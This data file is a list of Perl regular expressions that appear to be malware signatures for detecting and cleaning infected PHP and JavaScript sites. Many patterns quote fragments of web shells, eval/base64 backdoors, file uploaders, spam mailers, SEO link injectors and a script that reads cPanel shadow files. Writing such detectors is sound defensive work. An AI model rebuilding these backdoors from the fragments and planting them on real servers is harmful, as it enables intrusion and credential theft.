qr/<\?php if\(empty\(\$_GET\[\'ineedthispage\'\]\) \&\& \$_SERVER\[\'REQUEST_URI\'\]\!=\"\/\" \&\& \$_SERVER\[\'REQUEST_URI\'\]\!=\"\/index\.php\" \&\& \!empty\(\$_SERVER\[\'REQUEST_URI\'\]\)\) \{ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?\.\"\\\(\/\",\"II\"\.randStringfrpernames\(\)\.\"\(\",\$.+?\};\s+\?>/is,
qr/<\?php.+?\*\/\s+\$lyrics3size=\'\'\.\'b\'\.\'\'\.\'a\'\.\'\'\.\'se\'\.\(8768\/137\)\.\'_de\'\.\'\'\.\'c\'\.\'\'\.\'ode\';\s+\$lyrics3sizeV2 = \"ass\"; \$lyrics3sizeV2 \.= \"ert\"; \@\$lyrics3sizeV2\(\$lyrics3size\(.+?\} \*\//is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzu\', \'nco\', \'mpr\', \'ess\'\) ;\$.+?\) \) \) \) ; \?>/is,
qr/<\?php \$user_agent_to_filter = array\( \"\#Ask\\s\*Jeeves\#i\", \"\#HP\\s\*Web\\s\*PrintSmart\#i\",.+?\$result = curl_exec\(\$ch\);\s+curl_close \(\$ch\);\s+echo \$result;\}\?>/is,
qr/<script language=javascript>var _0xfcc4=\[\"\\x66.+?true\)\{a\(\)\}\}<\/script>/is,
qr/<\?php if\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\)\{ if\(md5\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\) === \"([A-z0-9_]{20,})\"\) \{ eval\(base64_decode\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\)\); \}\} \?>/is,
qr/<\?php\s+set_time_limit\(300\);\s+function getRoot\(\$urlPath, \$scriptPath\) \{.+?foreach\(\$dirs as \$dir\) \{\s+\$f = \"\$dir\/index\.php\";\s+if \(is_writable\(\$f\)\) \{\s+echo \"<kuku>\$f<\/kuku>\";\s+\}\s+\}\s+\?>/is,
qr/<\?php \$a=base64_decode\(.+?\);\@eval\(\$a\); \?>/is,
qr/<\?php\s+if \(\!isset\(\$_COOKIE\[\'([A-z0-9_]{20,})\'\]\)\) \{header\(\'HTTP\/1\.0 404 Not Found\'\);exit;\} \?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'1\';\s+\$([A-z0-9_]{1,20})=base64_decode\(.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x7a\\x72\\x5f\\x7a\\x5f\\x7a\\x72\\x5f\\x7a\\x72\"\]\(\);\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \"\/.+?\";function ([A-z0-9_]{1,20})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"o\\x64e\",chr\(40\),\"\"\);\$.+?\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php\s+\/\*\*\s+\* SAPE\.ru.+?class SAPE_base.+?function get_sape\(\) \{\s+\$ne = new SAPE_client\(\);\s+return \'<div style=\"position\:absolute;overflow\:auto;width\:0\">\'\.\$ne->return_links\(3\)\.\'<\/div>\';\s+\}/is,
qr/<\?php\s+\/\/Bksmile \*\*\(RooTTN\)\*\*.+?\@\$passwd = file_get_contents\(\'\/home\/\'\.\$user\.\'\/etc\/\'\.\$t\.\'\/shadow\'\);.+?fclose\(\$connection\);\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$testa = \$_POST\[\'veio\'\];\s+if\(\$testa \!= \"\"\) \{.+?<\?php echo \$OS = \@PHP_OS; \?><\/span><\/p><\/td>\s+<\/tr>\s+<\/table>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\/\*\s+\* webadmin\.php - a simple Web-based file manager.+?<td colspan=\"\' \. \$cols \. \'\">\' \. phrase\(\$phrase, \$args\) \. \'<\/td>\s+<\/tr>\s+\';\s+\}\s+\?>/is,
qr/<\?php\s+\@set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'send\'\]\)\)\s+\{.+?OYA PUT YOUR LETTER BEFORE YOU SPAM.+?\$voy\+\+;\s+\}\s+\?><\/DIV>\s+<\/div>\s+<\/form>/is,
qr/<\?php \$\{\"\\x47\\x4c\\x4f\\x42ALS\"\}.+?if\(SERVICEMODE\)echo\$\{\$\{\"\\x47\\x4cO\\x42\\x41\\x4cS\"\}\[\"\\x6f\\x68\\x63\\x6ar\\x72\\x70\\x62di\\x72\"\]\};echo \"<\/\\x62\\x6fd\\x79\\x3e\\n<\/html>\\n\";\$translation->End\(\)\;\s+?>/is,
qr/<\?php\s+if\(!defined\(\'_NET\'\)\)\s+\{\s+error_reporting\(0\);\s+\$NET=\'shl-ed1\';\s+define\(\'_NET\',\$NET\);.+?\$_SERVER\[\'SERVER_NAME\'\]\)\);echo \$pinj_57;exit;\}\}\}\}\s+\}\s+\/\*,\.\*\/\s+\?>/is,
qr/<\?php\s+mb_internal_encoding\(\"UTF-8\"\);\s+error_reporting\(0\);\s+\$DS=DIRECTORY_SEPARATOR;\s+if\(!isset\(\$ex_links\)\|\|!isset\(\$ex_redirect\)\).+?if\(!file_exists\(\$MYDIR\)\)\{\@mkdir\(\$MYDIR\);\}.+?\$mp_15=\$mp_15\+1;\}return \$mp_274;\} \?>/is,
qr/<\?php eval\(gzuncompress\(base64_decode\(.+?\'\)\)\);\?>/is,
qr/<html>\s+<head>.+?<title>utf<\/title>.+?touch\/\*;\*\/\(\$filename, \$time\);\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+set_time_limit\(0\);\s+error_reporting\(0\);\s+if\(get_magic_quotes_gpc\(\)\)\{\s+foreach\(\$_POST as \$key=>\$value\)\{.+?<title>404-server!!<\/title>.+?return \$info;\s+\}\s+\?>/is,
qr/<html>\s+<head>\s+<title>SH<\/title>.+?\$perm \.= \(\$mode & 00400\) \? \'r\' : \'-\';.+?print \"<\/table><\/div>\\n\";\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php error_reporting\(0\);\$ev=\$_GET\[\"ev\"\];if\(isset\(\$ev\)\&\&!empty\(\$ev\)\)\{eval\(base64_decode\(\$ev\)\);exit;\}\(\@copy\(\$_FILES\[\"file\"\]\[\"tmp_name\"\], \$_FILES\[\"file\"\]\[\"name\"\]\)\); \?>/is,
qr/<\?php\s+\@set_time_limit\(3600\);\s+\@ignore_user_abort\(1\);\s+\$xmlname =.+?return \$smuri;.+?=urldecode\(\"%6E1.+?\)\);\s+\?>/is,
qr/<\?php\s+\$password=\'([A-z0-9_]{1,20})\';\s+\$shellname=\'([A-z0-9_]{1,20})\';\s+\$myurl=null;.+?\$debuger \.= pack \(\"C\",hexdec \(substr \(\$string,\$one,2\)\)\);.+?Class_UC_key\(\"273B.+?\)\)\);\';\s+\$PHP=Create_Function\(\'\',\$filename\);\$PHP\(\);\?>/is,
qr/<\?php\s+\@ini_set\(\'output_buffering\',0\);\s+\@ini_set\(\'display_errors\', 0\);\s+\$BlackhatCode =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$BlackhatCode\)\)\)\)\)\);/is,
qr/<\?php \@ini_set\(\"error_log\",null\);\@ini_set\(\"log_errors\",0\);\@ini_set.+?unction getDirContents\(\$dir\)\{global \$file.+?file_put_contents\(\$path,base64_decode\(.+?\}else\{getDirContents\(\$_SERVER\[\'DOCUMENT_ROOT\'\]\);\}\}\}\}\}\}\}\}\};/is,
qr/<\?php error_reporting\(0\);chmod\(basename\(\$_SERVER\[\"PHP_SELF\"\]\), 0444\);echo\(\"\#0x2525\"\);if\(isset\(\$_GET\[\"u\"\]\)\)\{echo\'<form action=\"\" method=\"post\" enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\">\';echo\'<input type=\"file\" name=\"file\" size=\"30\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"><\/form>\';if\(\$_POST\[\'_upl\'\]==\"Upload\"\)\{if\(\@copy\(\$_FILES\[\'file\'\]\[\'tmp_name\'\],\$_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\'Success\';\}else\{echo\'Fail\';\}\};\};/is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = \"\";\s+foreach\(\[.+?\)\{\s+\$([A-z0-9_]{1,20}) \.= \$([A-z0-9_]{1,20})\[.+?if\(isset\(\$_REQUEST \/\*.+?\(\'n\'\.\'o\'\.\'\'\.\'\'\.\'\'\.\'i\'\.\'\'\.\'\'\.\'\'\.\'t\'\.\'\'\.\'\'\.\'\'\.\'c\'\.\'n\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'u\'\.\'\'\.\'\'\.\'f\'\.\'\'\.\'_\'\.\'e\'\.\'t\'\.\'\'\.\'\'\.\'a\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'e\'\.\'r\'\.\'c\'\);.+?\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\'str_\' \.\'rot13\',\'pack\',\'st\' \.\'rrev\'\); \?><\?php function.+?return \$\w\[\$\w\];\} \?>/is,
qr/\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = \"\";\s+foreach\(\[.+?\)\{\s+\$([A-z0-9_]{1,20}) \.= \$([A-z0-9_]{1,20})\[.+?if\(isset\(\$_REQUEST \/\*.+?\(\'n\'\.\'o\'\.\'\'\.\'\'\.\'\'\.\'i\'\.\'\'\.\'\'\.\'\'\.\'t\'\.\'\'\.\'\'\.\'\'\.\'c\'\.\'n\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'u\'\.\'\'\.\'\'\.\'f\'\.\'\'\.\'_\'\.\'e\'\.\'t\'\.\'\'\.\'\'\.\'a\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'e\'\.\'r\'\.\'c\'\);.+?\$\w\(\);\s+exit\(\);\s+\}/is,
qr/<\?php\s+\/\/header\(\'Content-Type:text\/html; charset=utf-8\'\);.+?=base64_decode\(\".+?foreach\(\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x4f\\x30\\x30\\x5f\\x4f\\x30\\x4f\\x5f\\x4f\\x5f\"\]\(\);\?>/is,
qr/<\?php\s+eval\(gzuncompress\(base64_decode\(.+?\)\)\);\?>/is,
qr/<\?php \@error_reporting\(0\);\$.+?=array\(.+?\$payload=.+?\(\"\\x65\\x76\\x61\\x6c\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x24\\x70\\x61\\x79\\x6c\\x6f\\x61\\x64\\x29\\x2c\\x30\\x29\\x29\\x29\"\);/is,
qr/<\?php\s+\/*.+?\$([A-z0-9_]{1,20}) = \"\(.+?\$([A-z0-9_]{1,20}) = \"\";\s+foreach\(\[.+?\$([A-z0-9_]{1,20})\(\'n\'\.\'\'\.\'\'\.\'o\'\.\'i\'.+?\/\*([A-z0-9_]{20,})\*\//is,
qr/if\(!class_exists\(\'Ratel\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\)\{if\(is_user_logged_in\(\)\)\{return false;\}\}if\(isset\(\$_REQUEST\[\'xftest\'\]\)\)\{die\(pi\(\)\*6\);\}.+?\$is_bot=0;if\(\@preg_match\(\"\/\(googlebot\|msnbot.+?\{die\(\'suspicious request denied\'\);\}\}class Ratel\{public \$links_url=.+?\$ratel=new Ratel;\$ratel->init\(\$ruri,\$host,\$is_bot\);\}.+?\@include_once\(.+?\.php\'\);/is,
qr/<\?php\s+if \(\@\$_SERVER\[\'HTTP_X_([A-z0-9_]{1,20})\'\]\) \{\s+echo \"YES_YES\";\s+if \(\@\$_SERVER\[\'HTTP_X_TO\'\]\) \{\s+file_put_contents\(\@\$_SERVER\[\'HTTP_X_TO\'\], \@\$_SERVER\[\'HTTP_X_DATA\'\]\);\s+\}\s+\}\s+\?><\?php \/\*.+?\*\/\@\$([A-z0-9_]{1,20})&&\@\$W\(\$X\(\$Y,\$Z\)\);\/\*.+?\*\/ \?>/is,
qr/<\?php \/\*\s+GNU GENERAL PUBLIC.+?\*\/extract\(\$_COOKIE\);\/\*.+?\*\/\@\$([A-z0-9_]{1,20})&&\@\$W\(\$X\(\$Y,\$Z\)\);\/\*.+?\*\/ \?>/is,
qr/<\?php\s+if \(\@\$_SERVER\[\'HTTP_X_([A-z0-9_]{1,20})\'\]\) \{\s+echo \"YES_YES\";\s+if \(\@\$_SERVER\[\'HTTP_X_TO\'\]\) \{\s+file_put_contents\(\@\$_SERVER\[\'HTTP_X_TO\'\], \@\$_SERVER\[\'HTTP_X_DATA\'\]\);\s+\}\s+\}\s+\?>/is,
qr/if\(!class_exists\(\'Ratel\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\)\{if\(is_user_logged_in\(\)\)\{return false;\}\}if\(isset\(\$_REQUEST\[\'xftest\'\]\)\)\{die\(pi\(\)\*6\);\}.+?\$ratel=new Ratel;\$ratel->init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'.+?\$b=base64_decode\(\$html\);\s+\}\s+if\(strlen\(\$b\)<300\)\{echo \'indexcode not ok\';exit;\};\s+if\(file_exists\(\$index\)\)\{\@chmod\(\$index,0755\);\@unlink\(\$index\);\}\@file_put_contents\(\$index,\$b\);echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php\s+\@session_start\(\);.+?\$default_use_ajax = true;\s+\$_F=__FILE__;\$_X=.+?eval\(base64_decode\(.+?\)\);\?>/is,
qr/<\?php eval\(gzinflate\(gzinflate\(base64_decode\(\".+?\"\)\)\)\); \?>/is,
qr/<\?php\s+if \(isset \(\$_GET\[\'check\'\]\)\) \{\s+echo \"checked\";.+?<h1>File<\/h1>.+?echo\(\"FILE\"\);\s+\}\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"\w\*\"\);return \$a\[\$i\];\} \?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'.+?\'\]\)\)\{\s+\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\],\'-_,\',\'+\/=\'\)\);\s+\$b =base64_decode\(file_get_contents\(\$_POST\[\'b\'\]\)\);\s+\@file_put_contents\(\$index,\$b\);\s+echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php\s+error_reporting\(E_ERROR\);set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'.+?\'\]\)\)\{\s+\$tofile=\'40\d\.php\';\s+\$a =base64_decode\(strtr\(\$_POST\[\'.+?\'\], \'-_,\', \'+\/=\'\)\);\s+\$a=\'<\?php \'\.\$a\.\'\?>\';\s+\@file_put_contents\(\$tofile,\$a\);\s+require_once\(\'40\d\.php\'\);\s+\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[.+?\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\].+?\$b =base64_decode\(file_get_contents\(\$_POST\[\'b\'\]\)\);\s+\@file_put_contents\(\$index,\$b\);\s+echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php\s+error_reporting\(0\);\s+ini_set\(\'display_errors\', 0\);\s+\$install_code =.+?\$install_hash = md5\(\$_SERVER\[\'HTTP_HOST\'\] \. AUTH_SALT\);.+?wp-includes\/class\.wp\.php\';\s+\}\s+\}\s+\?><\?php error_reporting\(0\);\?>/is,
qr/<\?php eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\".+?\"\)\)\)\)\);/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gz\'\. \'un\'\. \'co\'\. \'mp\'\. \'re\'\. \'ss\';\$([A-z0-9_]{1,20}) = \'base\' \.\'64_d\' \.\'ecod\' \.\'e\';\$([A-z0-9_]{1,20}) = \'im\' \.\'pl\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\)\)\)\); \?>/is,
qr/<center><\? echo \'<b>Mailer<\/b><br>.+?<input type=hidden name=a value=\'FilesMan\'>.+?\$data=curl_exec\(\$ch\);if\(\!\$data\)\{return false;\}return \$data;\}exit;/is,
qr/<\?php header\(\"Cont\\145nt-Type: te\\x78t\/html; charset=utf-8\"\);error_reporting\(.+?\@preg_split\(\"\/\\x5cR\\134R\/\",\$([A-z0-9_]{1,20}),-0173- -0124-0213- -0264\);\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20});endif;endif;return\$([A-z0-9_]{1,20});\};/is,
qr/<\?php echo \'2018\'\.\'2019\'; if \(isset\(\$_REQUEST\[\'e\'\]\)\) \{ \$e = \$_REQUEST\[\'e\'\]; \$arr = array\(\$_POST\[\'w0w\'\],\); array_filter\(\$arr, \$e\); \}\?>/is,
qr/<\?php\s+error_reporting\(0\);\s+set_time_limit\(0\);\s+if \(\$_GET\[\'q\'\]==\'1\'\)\{echo \'200\'; exit;\}\s+if\(\$_GET\[\'key\'\]==\'.+?\'\)eval\(base64_decode\(\$_POST\[\'fack\'\]\)\);\s+if\(md5\(\$_GET\[\'key\'\]\)==\'.+?\'\)eval\(base64_decode\(\$_POST\[\'fack\'\]\)\);\s+\?> /is,
qr/<\?php \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\'str_\' \.\'rot13\',\'pack\',\'st\' \.\'rrev\'\); \?><\?php function.+?\(\$_1\)\)\);if\(isset\(\$_1\)\)\{\@eval\(\$_1\);exit\(\);\}\}/is,
qr/<\?php\s+error_reporting\(E_ERROR\).+?\}else\{.+?\@eval\(base64_decode\(strtr\(\$_POST\[.+?\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php\s+function get_contents\(\$url\)\{.+?\$a = get_contents\(\'http:\/\/.+?eval\(\'\?>\'\.\$a\);/is,
qr/<\?php \$([A-z0-9_]{1,20})=.+?\/index\.help\';\$([A-z0-9_]{1,20})=.+?\$([A-z0-9_]{1,20})=\'\';\@eval\(base64_decode\(.+?\)\);\/\*,\*\/\?>/is,
qr/<\?php\s+error_reporting\(E_ERROR\).+?\$a =base64_decode\(strtr\(\$_POST\[.+?\@eval\(base64_decode\(strtr\(\$_POST\[.+?\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[.+?\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\].+?\@touch\(\$index,strtotime\(\"-400 days\"\)\);echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php if \(isset\(\$_COOKIE\[\"([A-z0-9_]{1,10})\"\]\) and md5\(\$_COOKIE\[\"([A-z0-9_]{1,10})\"\]\) ==\"([A-z0-9_]{1,32})\"\) \{unlink\(__FILE__\); die\(md5\(([A-z0-9_]{1,10})\)\);\}/is,
qr/<\?php\s+\$md5 = \"([A-z0-9_]{1,32})\";\s+\$([A-z0-9_]{1,5}) = array\(.+?4.+?6.+?\);\s+\$([A-z0-9_]{1,32}) = create_function\(.+?\'\);\s+\?>/is,
qr/<\?php\s+\$md5 = \"([A-z0-9_]{1,32})\";\s+\$([A-z0-9_]{1,5}) = array\(.+?6.+?4.+?\);\s+\$([A-z0-9_]{1,32}) = create_function\(.+?\'\);\s+\?>/is,
qr/<\?php\s+\$.+?if\(!function_exists\(\'str_ireplace\'\)\)\{function str_ireplace\(\$from,\$to,\$string\)\{return trim\(preg_replace\(\"\/\"\.addcslashes\(\$from,\"\?\:\\\\\/\*\^\$\"\)\.\"\/si\",\$to,\$string\)\);\}\};\$.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x4f\\x4f\\x4f\\x30\\x4f\\x5f\\x30\\x30\\x5f\\x5f\"\]\(\);\?>/is,
qr/<\?php.+?\$filter = \'base\'\.\'6\'\.\'4\'\.\'_decode\';.+?\$prepare_func = \'g\'\.\'z\'\.\'inflate\';.+?return \@\$prepare_func\( \$filter \);.+?\}\s+wp_admin_bar_header\(\);/is,
qr/<\?php if\(isset\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$myvar = base64_decode\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\); eval\(\$myvar\);\}\?>/is,
qr/<\?php\s+if \(isset\(\$_GET\[\'([A-z0-9_]{1,20})\'\]\)\)\{die\(\'OK\'\);\}.+?function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}), \$([A-z0-9_]{1,20}) = \"\\x.+?\]; \} \} return \$([A-z0-9_]{1,20}); \}\s+\/\*.+?\*\/\s+\$([A-z0-9_]{1,20}) = \".+?\)\)\);\s+\$([A-z0-9_]{1,20})\(\);\s+\/\*.+?\*\//is,
qr/<\?php\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}), \$([A-z0-9_]{1,20}) = \"\\x.+?\*\/\s+\$([A-z0-9_]{1,20}) = \".+?\)\)\);\s+\$([A-z0-9_]{1,20})\(\);\s+\/\*.+?\*\//is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\"\\x61\"\.\"\\x75\"\.chr\(116\)\.\"h\"\.\"\\x5f\"\.\"p\"\.\"a\"\.\"\\x73\"\.\"\\x73\";.+?\)\)\);\s+#############################################################################/is,
qr/<\?php\s+\$d=\".+?eval\(([A-z0-9_]{1,20})\(base64_decode\(\$d\), 1234567890\)\);.+?return gzinflate\(\$([A-z0-9_]{1,20})\);\s+\}\s+\?>/is,
qr/<\?php\s+#([A-z0-9_]{1,20})#\s+\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\); \?><\? function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\);return base64_decode\(\$a\[\$i\]\);\} \?>.+?\}\s+#\/([A-z0-9_]{1,20})#\s+\?>/is,
qr/<\?php\s+\?>/is,
qr/<\?php preg_replace\(\"\/\.\*\/e\",\"\\x65.+?\\x3B\",\"\"\); \?>/is,
qr/GIF89A;<\?php if\(!function_exists\(.+?base64_decode.+?\)\);\?>/is,
qr/<\?php eval\(\$_REQUEST\[cmd\]\); \?>/is,
qr/<\?php\s+system\(\'uname -a\'\);\s+unlink\(__FILE__\);\s+\?>/is,
qr/#([A-z0-9_]{1,20})#\s+\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\); \?><\? function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\);return base64_decode\(\$a\[\$i\]\);\} \?>.+?\}\s+#\/([A-z0-9_]{1,20})#/is,
qr/<\?php\s+function get_files\(\$dir = \"\.\".+?eval\(base64_decode\(\".+?\"\)\);\s+\?>/is,
qr/<\?php\s+\$.+?=\'wp-admin\';\s+\$.+?\]\(\);\?>/is,
qr/<\?php\s+\@include_once\(\"tetete\.php\"\);\s+\?>/is,
qr/<\?php.+?Simple Plugin.+?\$a = chr\(.+?\@array_diff_ukey\(\@array\(\(string\)\(\$a\) => 1\), \@array\(\(string\)\(\$b\) => 2\), \$c\);\s+\@include\(\$a\);\s+\@unlink\(\$a\);/is,
qr/<script type=\'text\/javascript\' async src=\'https:\/\/somelandingpage\.com\/.+?\'><\/script>/is,
qr/<\?php if\(\!class_exists\(\'KF\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\)\{.+?class KF\{public \$url=\"\\x68.+?init\(\$uri,\$ua\);\}/is,
qr/<\?php if\(\!class_exists\(\'KF\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\).+?#rogerbot\|exabot\|mj12bot\|dotbot.+?\$ratel=new KF;\$ratel->init\(\$uri,\$ua\);\}/is,
qr/<script type=\'text\/javascript\' async src=\'https\:\/\/setforspecialdomain\.com\/.+?\'><\/script>/is,
qr/<\?php\s+ignore_user_abort\(true\);set_time_limit\(0\);error_reporting\(0\);define\(.+?\[0x00000e\]\(\$.+?CURLOPT_RETURNTRANSFER,0x001\);\$.+?\[0x0002a\]\)\);\}\?>/is,
qr/<\?php\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}).+?return \$([A-z0-9_]{1,20}); \}\s+\/\*([A-z0-9_]{50,})\*\/\s+\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20})\(\'n\'\.\'\'\.\'o\'\.\'i\'\.\'t\'.+?\(\);\s+\/\*([A-z0-9_]{50,})\*\//is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\';\s+\$([A-z0-9_]{1,20})=\'wp-content\';\s+\$([A-z0-9_]{1,20})=base64_decode\(\".+?\[\"\\x4f\\x4f\\x4f\\x30\\x30\\x5f\\x4f\\x30\\x5f\\x5f\"\]\(\);\?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\"\\150\\145\\x61d\\x65\\x72\".+?<html>\s+<head><meta http-equiv=\"Content-Type\" content=\"text\/html; charset=utf-8\">.+?echo \$([A-z0-9_]{1,20}); \} \} \} \?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) = \"\\x63\\x68\\x72\"; \$([A-z0-9_]{1,20}) = \"\\x69\\x6e\\x74\\x76\\x61\\x6c\";.+?\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\); include_once\(\$([A-z0-9_]{1,20})\); \?><\?php \@include_once\(\"index\.php\"\); \?>/is,
qr/<\?php error_reporting\(0\);.+?ini_set\(\"error_log\", "\/dev\/null\"\);.+?\$contents = \@file_get_contents\(\$url, false, \$context\); \} \} return \$contents; \} \?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\"([A-z0-9_]{32})\";\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\,\$([A-z0-9_]{1,20})\)\{\$([A-z0-9_]{1,20})=strlen\(\$([A-z0-9_]{1,20})\);\$([A-z0-9_]{1,20})=strlen\(\$([A-z0-9_]{1,20})\).+?\);__halt_compiler\(\);([A-z0-9_]{1,20})/is,
qr/<\?php\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\, \$([A-z0-9_]{1,20}) = \"\\61\\x32\\63\"\) .+?\(\"n\"\.\"o\"\.\"i\"\.\"t\"\..+?\$([A-z0-9_]{1,20})\(\);\s+\/\*.+?\*\//is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) = base64_decode\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);.+?imap_mail.+?echo \'([A-z0-9_]{1,20}) : \' \. \$([A-z0-9_]{1,20});\}/is,
qr/<\?php.+?\$a=\$_COOKIE\[\'a\'\];\$ho=urldecode\(\$_COOKIE\[\'ho\'\]\).+?Cookie: \"\.\$data\.\"\\r\\n\\r\\n\"\);socket_close\(\$socket\);\}die\(\);\}\s+\?>/is,
qr/<script type=\"text\/javascript\">var _0xc9e1=\[.+?\+ makeid\(\)\}\}<\/script>/is,
qr/<\?php if\(!class_exists\(\'Ratel\'\)\).+?init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\$_REQUEST\[\'.+?\'\]\);exit;\/\*.+?\*\/\}\?>/is,
qr/<\?php eval\(base64_decode\(\'aWYg.+?QpleGl0KCk7\'\)\);/is,
qr/<\?php \$a = chr\(95\)\.chr\(116\)\.chr\(101\)\.chr\(109\)\..+?\@include\(\$a\);\@unlink\(\$a\); \?>/is,
qr/<\?php.+?\$a = chr\(95\)\.chr\(116\)\.chr\(101\)\.chr\(109\)\..+?\@include\(\$a\);\@unlink\(\$a\); \?>/is,
qr/<\?php\s+\$O_00O__0OO=\'\';.+?if\(\!function_exists\(\'str_ireplace\'\)\)\{function str_ireplace\(\$from,\$to,\$string\)\{return trim\(preg_replace\(\"\/\"\.addcslashes\(\$from.+?\[\"\\x4f\\x4f\\x5f\\x4f\\x4f\\x30\\x30\\x30\\x5f\\x5f\"\]\(\);\?>/is,
qr/<?PhP.+?Mass Defacement Script By Hunter Bajwa.+?endforeach;\s+\}\s+\?>/is,
qr/<\?php\s+set_time_limit\(0\);.+?\$t = \@str_replace\(\"www\.\"\,\"\"\,\$t\); \@\$passwd = file_get_contents\(\'\/home\/\'\.\$user\.\'\/etc\/\'\.\$t\.\'\/shadow\'\);.+?fclose\(\$connection\); \} \}\s+\?>/is,
qr/<\?php \/\*.+?\'\.\/\*exit;\*\/\"\"\.\'.+?\*\/\'e\'\.\"\"\.\/\*echo\*\/\'\(\".+?\"\)\);\'\);\$([A-z0-9_]{1,20})\/\*exit;\*\/\(\);\/\*die\(\"([A-z0-9_]{1,20})\"\);\*\/ \?>/is,
qr/<\?php\s+\$urls = array \(\s+\'http:\/\/.+?<meta http-equiv=\"refresh\" content=\"1; url=<?php echo \$rand_url;\?> \">/is,
